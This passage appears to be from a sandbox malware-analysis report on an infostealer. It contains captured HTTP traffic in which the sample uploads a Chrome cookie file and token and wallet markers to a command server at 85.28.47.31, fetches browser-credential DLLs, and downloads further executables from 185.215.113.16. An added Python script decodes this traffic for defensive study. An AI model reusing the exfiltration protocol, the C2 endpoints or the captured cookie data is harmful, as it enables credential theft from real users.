61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file"------FBFHDBKJEGHJJJKFIIJE--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFCFBKFCFCBGDGIEGHHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 46 42 4b 46 43 46 43 42 47 44 47 49 45 47 48 2d 2d 0d 0a Data Ascii: ------CGCFCFBKFCFCBGDGIEGHContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------CGCFCFBKFCFCBGDGIEGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGCFCFBKFCFCBGDGIEGHContent-Disposition: form-data; name="file"------CGCFCFBKFCFCBGDGIEGH--
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDGHost: 85.28.47.31Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 2d 2d 0d 0a Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="message"wallets------DGIJEGHDAECAKECAFCAK--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 2d 2d 0d 0a Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="message"ybncbhylepme------BFIIEHJDBKJKECBFHDGH--
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file"------FBFHDBKJEGHJJJKFIIJE--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FBFHDBKJEGHJJJKFIIJEContent-Disposition: form-data; name="file"------FBFHDBKJEGHJJJKFIIJE--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFIDHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 2d 2d 0d 0a Data Ascii: ------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="message"files------GIEHJDHCBAEHJJJKKFID--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 34 31 35 64 39 30 34 61 33 64 34 32 64 35 61 38 65 36 66 33 63 34 62 39 61 64 61 34 37 38 33 63 32 33 62 35 64 37 61 64 33 63 61 62 64 31 66 39 39 30 62 30 64 61 36 64 33 66 33 32 34 35 33 32 64 64 63 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EGIDAAFIEHIEHJKFHCAE--
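The POSTs to /5499d72b3a3e55be.php on 85.28.47.31 above follow a fixed sequence: one multipart registration carrying hwid and build, then token plus message markers (browsers, plugins, fplugins, wallets, files, and random-looking strings), token plus base64-encoded file_name and file uploads, with GETs for the NSS/SQLite DLLs (sqlite3, freebl3, mozglue, nss3, softokn3 and the VC runtime) the stealer needs to read browser credential stores in between. The Python below is an added example, not part of the Joe Sandbox report or of the malware: it parses the multipart bodies as the report prints them (the registration body is copied from the Data Raw hex above; the cookie upload and the empty .pwd upload are rebuilt from the Data Ascii view, which truncates the cookie value), decodes the base64 fields, parses the uploaded Netscape-format cookie export, and flags the DLL download set. The stage labels (register, marker, upload), the request list and the CREDENTIAL_TOOLKIT set are my own names for what the traffic shows; the token value is treated as opaque.

```python
import base64
import re

# Hex dump copied from the report's first POST to /5499d72b3a3e55be.php (Content-Length 211).
REGISTRATION_HEX = (
    "2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 "
    "66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    "46 36 41 43 44 37 44 43 45 35 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a "
    "2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 "
    "66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a "
    "73 69 6c 61 0d 0a "
    "2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a"
)

# Rebuilt from the report's Data Ascii view of the cookie upload; the ASCII view cuts the
# cookie value short, so the decoded NID value below is a prefix of the real one.
COOKIE_UPLOAD = (
    b"------CAKFIJDHJEGIDHJKKKJJ\r\n"
    b'Content-Disposition: form-data; name="token"\r\n\r\n'
    b"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765\r\n"
    b"------CAKFIJDHJEGIDHJKKKJJ\r\n"
    b'Content-Disposition: form-data; name="file_name"\r\n\r\n'
    b"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0\r\n"
    b"------CAKFIJDHJEGIDHJKKKJJ\r\n"
    b'Content-Disposition: form-data; name="file"\r\n\r\n'
    b"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlY"
    b"Y3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZw"
    b"czBiaGVtZndDUEJzTE1nUFQ3\r\n"
    b"------CAKFIJDHJEGIDHJKKKJJ--\r\n"
)

# Rebuilt from the report: an upload whose "file" part is empty (nothing was harvested).
EMPTY_UPLOAD = (
    b"------FBFHDBKJEGHJJJKFIIJE\r\n"
    b'Content-Disposition: form-data; name="token"\r\n\r\n'
    b"66415d904a3d42d5a8e6f3c4b9ada4783c23b5d7ad3cabd1f990b0da6d3f324532ddc765\r\n"
    b"------FBFHDBKJEGHJJJKFIIJE\r\n"
    b'Content-Disposition: form-data; name="file_name"\r\n\r\n'
    b"c21qbGxteW1sYnpxLnB3ZA==\r\n"
    b"------FBFHDBKJEGHJJJKFIIJE\r\n"
    b'Content-Disposition: form-data; name="file"\r\n\r\n'
    b"\r\n"
    b"------FBFHDBKJEGHJJJKFIIJE--\r\n"
)

# (method, host, path) tuples constructed from the request lines in the report.
SESSION_REQUESTS = [
    ("GET", "85.28.47.31", "/"),
    ("POST", "85.28.47.31", "/5499d72b3a3e55be.php"),
    ("GET", "85.28.47.31", "/8405906461a5200c/sqlite3.dll"),
    ("GET", "85.28.47.31", "/8405906461a5200c/freebl3.dll"),
    ("GET", "85.28.47.31", "/8405906461a5200c/mozglue.dll"),
    ("GET", "85.28.47.31", "/8405906461a5200c/msvcp140.dll"),
    ("GET", "85.28.47.31", "/8405906461a5200c/nss3.dll"),
    ("GET", "85.28.47.31", "/8405906461a5200c/softokn3.dll"),
    ("GET", "85.28.47.31", "/8405906461a5200c/vcruntime140.dll"),
    ("GET", "185.215.113.16", "/soka/random.exe"),
    ("POST", "185.215.113.16", "/Jo89Ku7d/index.php"),
]

# Legitimate Mozilla NSS / SQLite / MSVC runtime DLLs the sample fetched over plain HTTP.
# A non-browser process pulling this exact set is a strong browser-credential-theft indicator.
CREDENTIAL_TOOLKIT = {"sqlite3.dll", "freebl3.dll", "mozglue.dll", "msvcp140.dll",
                      "nss3.dll", "softokn3.dll", "vcruntime140.dll"}


def parse_multipart(boundary: bytes, body: bytes) -> dict:
    """Split a multipart/form-data body into {field name: raw value bytes}.
    `boundary` is the value from the Content-Type header; parts are delimited by "--" + boundary."""
    delimiter = b"--" + boundary
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # "--boundary--" closes the body
            break
        head, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', head)
        if match:
            fields[match.group(1).decode()] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def classify(fields: dict) -> dict:
    """Label one POST with the stage of the exfil sequence seen in the report (my own labels)."""
    if "hwid" in fields and "build" in fields:
        return {"stage": "register", "hwid": fields["hwid"].decode(), "build": fields["build"].decode()}
    if "file_name" in fields:
        name = base64.b64decode(fields["file_name"]).decode()
        data = base64.b64decode(fields["file"]) if fields.get("file") else b""
        return {"stage": "upload", "file_name": name, "data": data}
    if "message" in fields:
        return {"stage": "marker", "message": fields["message"].decode()}
    return {"stage": "unknown"}


def parse_netscape_cookies(data: bytes) -> list:
    """Parse the tab-separated cookie export (domain, subdomain flag, path, secure, expiry, name, value)."""
    rows = []
    for line in data.decode("utf-8", "replace").splitlines():
        cols = line.split("\t")
        if len(cols) == 7:
            domain, _subdomains, path, secure, expires, name, value = cols
            rows.append({"domain": domain, "path": path, "secure": secure == "TRUE",
                         "expires": int(expires), "name": name, "value": value})
    return rows


def toolkit_downloads(requests: list) -> set:
    """Return which credential-toolkit DLLs were fetched in a list of (method, host, path) tuples."""
    return {path.rsplit("/", 1)[-1].lower() for method, _host, path in requests
            if method == "GET" and path.rsplit("/", 1)[-1].lower() in CREDENTIAL_TOOLKIT}


if __name__ == "__main__":
    print(classify(parse_multipart(b"----DAKEBAKFHCFHIEBFBAFB", bytes.fromhex(REGISTRATION_HEX))))
    upload = classify(parse_multipart(b"----CAKFIJDHJEGIDHJKKKJJ", COOKIE_UPLOAD))
    print(upload["file_name"], parse_netscape_cookies(upload["data"]))
    print(classify(parse_multipart(b"----FBFHDBKJEGHJJJKFIIJE", EMPTY_UPLOAD)))
    print(sorted(toolkit_downloads(SESSION_REQUESTS)))
```

Run against the report's dumps, the registration decodes to hwid F6ACD7DCE5231817704571 with build "sila", the file uploads decode to "cookies\Google Chrome_Default.txt" (one .google.com NID cookie) and an empty "smjllmymlbzq.pwd", and all seven toolkit DLLs are present. The hex `r=` form posts to /Jo89Ku7d/index.php are not decoded here because their encoding cannot be recovered from the page.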
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 44 41 31 34 30 43 32 46 33 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFDA140C2F3FD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
